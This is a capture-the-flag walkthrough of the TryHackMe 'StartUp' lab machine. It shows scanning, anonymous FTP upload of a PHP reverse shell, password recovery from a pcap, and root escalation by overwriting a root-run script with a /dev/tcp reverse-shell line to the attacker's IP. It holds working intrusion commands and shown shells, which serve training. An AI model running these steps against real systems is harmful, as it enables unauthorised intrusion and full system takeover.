StartUp
Room Covers:
Discovery
Exploitation
Privilege Escalation (horizontal + vertical)
Target Details
IP: 10.10.115.38
Service and Content Discovery
Scan Machine with Nmap
nmap -sC -sV -Pn -oN nmap.txt 10.10.115.38 Nmap scan report for 10.10.115.38 Host is up (0.38s latency). Not shown: 996 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed (FTP code 230) | drwxrwxrwx 2 65534 65534 4096 Nov 12 2020 ftp [NSE: writeable] | -rw-r--r-- 1 0 0 251631 Nov 12 2020 important.jpg |_-rw-r--r-- 1 0 0 208 Nov 12 2020 notice.txt | ftp-syst: | STAT: | FTP server status: | Connected to 10.x.x.x | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 2 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 b9:a6:0b:84:1d:22:01:a4:01:30:48:43:61:2b:ab:94 (RSA) | 256 ec:13:25:8c:18:20:36:e6:ce:91:0e:16:26:eb:a2:be (ECDSA) |_ 256 a2:ff:2a:72:81:aa:a2:9f:55:a4:dc:92:23:e6:b4:3f (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-title: Maintenance |_http-server-header: Apache/2.4.18 (Ubuntu) 1131/tcp filtered caspssl Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sat Jul 2 13:34:28 2022 -- 1 IP address (1 host up) scanned in 64.99 secondsWe can login anonymously on FTP and we can write data anonymously in
ftpdirectoryServices Discovered
ServicePortVersionFTP
21
vsftpd 3.0.3
SSH
22
OpenSSH 7.2p2
HTTP
80
Apache httpd 2.4.18
Visiting HTTP website doesn't provide much information
Finding directories using gobuster
gobuster dir -u http://10.10.115.38 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt -t 30 --no-error -o web-dirs.txtDirectories Found
DirectoryLinkfiles
/files
On visitng
/fileswe get few files along with notice directory
Accessing FTP
Login anonymously
ftp 10.10.115.38 Connected to 10.10.115.38. 220 (vsFTPd 3.0.3) Name (10.10.115.38:attacker): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp>Logged in successfully
list files
ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxrwxrwx 2 65534 65534 4096 Jul 02 09:09 ftp -rw-r--r-- 1 0 0 251631 Nov 12 2020 important.jpg -rw-r--r-- 1 0 0 208 Nov 12 2020 notice.txtfiles are of web directory
/files
Get Reverse Shell from Target Machine
Download php reverse shell
wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.phpIn reverse shell, change IP to TryHackMe VPN IP. default port is 1234
Start Netcat listener
nc -nlvp 1234Upload via FTP anonymously
ftp> cd ftp 250 Directory successfully changed. ftp> put php-reverse-shell.php local: php-reverse-shell.php remote: php-reverse-shell.php 200 PORT command successful. Consider using PASV. 150 Ok to send data. 226 Transfer complete. 5596 bytes sent in 0.00 secs (53.3676 MB/s) ftp>sFrom browser visit
/files/ftp/directory and click on reverse shell file to get reverse shell on attacker's terminal# nc -nlvp 1234 listening on [any] 1234 ... connect to [10.x.x.x] from (UNKNOWN) [10.10.115.38] 51642 Linux startup 4.4.0-190-generic #220-Ubuntu SMP Fri Aug 28 23:02:15 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux 08:15:07 up 13 min, 0 users, load average: 0.07, 0.51, 0.44 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $
Search for First Flag
Find files
$ whoami www-data $ ls bin boot dev etc home incidents initrd.img initrd.img.old lib lib64 lost+found media mnt opt proc recipe.txt root run sbin snap srv sys tmp usr vagrant var vmlinuz vmlinuz.oldRead
recipe.txtfile$ cat recipe.txt Someone asked what our main ingredient to our spice soup is today. I figured I can't keep it a secret forever and told him it was xxxx.We need to escalate privileges to read files
Privilege Escalation
Finding files with sticky bits
$ find / -perm -u=s -type f 2>/dev/null /bin/mount /bin/fusermount /bin/umount /bin/ping6 /bin/su /bin/ping /usr/bin/passwd /usr/bin/pkexec /usr/bin/at /usr/bin/sudo /usr/bin/newuidmap /usr/bin/chfn /usr/bin/newgrp /usr/bin/chsh /usr/bin/newgidmap /usr/bin/gpasswd /usr/lib/eject/dmcrypt-get-device /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic /usr/lib/snapd/snap-confine /usr/lib/openssh/ssh-keysign /usr/lib/policykit-1/polkit-agent-helper-1Couldn't find something important
Checking for Python to get shell with tty
$ python --version Python 2.7.12Spawn TTY terminal to use sudo/su
python -c 'import pty; pty.spawn("/bin/bash")' www-data@startupfrom
/incidentsdirectory found a pcap filewww-data@startup:/incidents$ ls -l total 32 -rwxr-xr-x 1 www-data www-data 31224 Nov 12 2020 suspicious.pcapngTo analzye this file in WireShark, we need to first download the file, let's copy this file in
ftpdirectory, then we can download it from web serverwww-data@startup:/incidents$ cp suspicious.pcapng /var/www/html/files/ftpDownload the file from
http://10.10.115.38/files/ftp/suspicious.pcapngLoad the file in WireShark, right click on TCP packet number around 200 and choose follow -> TCP Stream, a list of commands will pop up in a new window, from where we can find the password
From pcap file: use follow lennie password
c4ntg3txxxxxxxxxxxNow, we can log into lennie's account with the password
su lennie Password: lennie@startup:~$We've successfully escalated privileges horiztontally
Get User Flag
Finding Flag
lennie@startup:~$ ls Documents scripts user.txtRead
user.txtfilelennie@startup:~$ cat user.txt THM{03ce3d619b80ccxxxxxxxxxxxxxxxxxx}
Escalating Privileges Vertically
finding executables with sticky bits
lennie@startup:~$ find / -perm -u=s -type f 2>/dev/null /bin/mount /bin/fusermount /bin/umount /bin/ping6 /bin/su /bin/ping /usr/bin/passwd /usr/bin/pkexec /usr/bin/at /usr/bin/sudo /usr/bin/newuidmap /usr/bin/chfn /usr/bin/newgrp /usr/bin/chsh /usr/bin/newgidmap /usr/bin/gpasswd /usr/lib/eject/dmcrypt-get-device /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic /usr/lib/snapd/snap-confine /usr/lib/openssh/ssh-keysign /usr/lib/policykit-1/polkit-agent-helper-1let's try sudo
get sudo executables list
lennie@startup:~$ sudo -l [sudo] password for lennie: c4ntg3t3n0ughsp1c3 Sorry, user lennie may not run sudo on startup.We cannot use
sudocommandThere was scripts folder in the home directory
lennie@startup:~$ ls -l scripts total 8 -rwxr-xr-x 1 root root 77 Nov 12 2020 planner.sh -rw-r--r-- 1 root root 1 Jul 2 10:42 startup_list.txtplanner.shscript belongs torootuserRead
planner.shscriptlennie@startup:~$ cat scripts/planner.sh #!/bin/bash echo $LIST > /home/lennie/scripts/startup_list.txt /etc/print.shscripts calls another script
/etc/print.shwith root privilegesLet's analyze
print.shscriptlennie@startup:~$ ls -l /etc/print.sh -rwx------ 1 lennie lennie 60 Jul 2 10:11 /etc/print.shThis script belongs to lennie, hence we can write it and create a reverse shell with root access
Overwrite file contents
echo "bash -c 'exec sudo bash -i &>/dev/tcp/10.x.x.x/9999 <&1'" > /etc/print.shStart netcat listener on attacker's machine on port 9999
nc -nlvp 9999 listening on [any] 9999 ...Execute
planner.shscriptbash /home/lennie/scripts/planner.shGet Reverse Shell
nc -nlvp 9999 listening on [any] 9999 ... connect to [10.x.x.x] from (UNKNOWN) [10.10.115.38] 50290 sudo: unable to resolve host startup bash: cannot set terminal process group (5564): Inappropriate ioctl for device bash: no job control in this shell root@startup:~#We've successfully got root privileges machine
Get Root Flag
List files
root@startup:~# ls root.txtRead
root.txtfileroot@startup:~# cat root.txt THM{f963aaa6a43xxxxxxxxxxxxxxxxxxxxx}
Last updated
Was this helpful?